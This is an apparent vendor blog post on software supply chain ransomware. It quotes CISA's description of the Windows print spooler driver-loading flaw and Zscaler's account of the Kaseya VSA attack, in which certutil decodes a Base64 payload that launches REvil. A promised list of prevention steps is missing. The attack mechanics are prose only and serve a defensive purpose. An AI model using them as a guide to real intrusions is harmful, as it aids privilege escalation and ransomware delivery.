Software supply chain ransomware attacks have increased dramatically In recent months, but few people understand the underlying factors driving the focus on supply chain vulnerabilities from cybercriminals.
Source: Advanced control services
Modern software and systems development have become very complex, and rely on several suppliers providing many pre-packaged, open-source modules, frameworks, or services required to build the end software product or systems.
The software developers use these modules and services to accelerate the development process, be more efficient and cost-effective. Mechanisms to integrate pre-packaged software include APIs, service calls, drivers, or other integration mechanisms
For example, a large technology organization hires third-party contractors to carry out routine website updates and gives these contractors access to its intranet or network. In many cases, the third parties themselves contract some of the work to other third parties.
When everything is said and done, there are many components and providers contributing to the development of one software product or system. Each of these integrated components add a level of security risk to the end product.
Microsoft Windows 11 Print supply chain attack
“The RpcAddPrinterDriverEx() function is used to install a printer driver on a system. One of the parameters to this function is the DRIVER_CONTAINER object, which contains information about which driver is to be used by the added printer. The other argument, dwFileCopyFlags, specifies how replacement printer driver files are to be copied. An attacker can take advantage of the fact that any authenticated user can call RpcAddPrinterDriverEx() and specify a driver file that lives on a remote server. This results in the Print Spooler service spoolsv.exe executing code in an arbitrary DLL file with SYSTEM privileges”. Source CISA.org
Kaseya supply chain attack
“The threat actor behind this attack identified and exploited a zero day vulnerability in the Kaseya VSA server. The compromised Kaseya VSA server was used to send a malicious script to all clients that were managed by that VSA server. The script was used to deliver REvil ransomware that encrypt files on the affected systems
certutil.exe is used to decode the Base64 encoded payload located in agent.crt and writes the result to an executable file named agent.exe in the working directory of Kaseya. The Windows batch script then executes the agent.exe file, which will create and launch the REvil ransomware payload.” Source: Zscaler Inc.
These are two examples of a simple software supply chain ransomware attacks that had devastating results on thousands of of companies, however it is important review other prevention methods https://hackerstrike.com/ransomware-prevention-and-protection-measures/
In general, every organization should have clear and consistent security protocols such as strong password management, firewalls, intrusion protection systems, etc. However, when dealing with software supply chain ransomware attacks, organizations must go well beyond traditional cybersecurity practices. Some of the steps recommended to reduce the risks from this attack vector are:
The increasing frequency of ransomware attacks makes it eminent that your organization will be a victim if it hasn’t been already.
In addition to the recommendations mentioned above, I believe that detecting and blocking unexpected behaviors is the best way to prevent these attacks. As a result, organizations should review their current security tools’ capabilities to detect and block software supply chain attacks.
By Ralph aceves
CEO, HackerStrike Corporation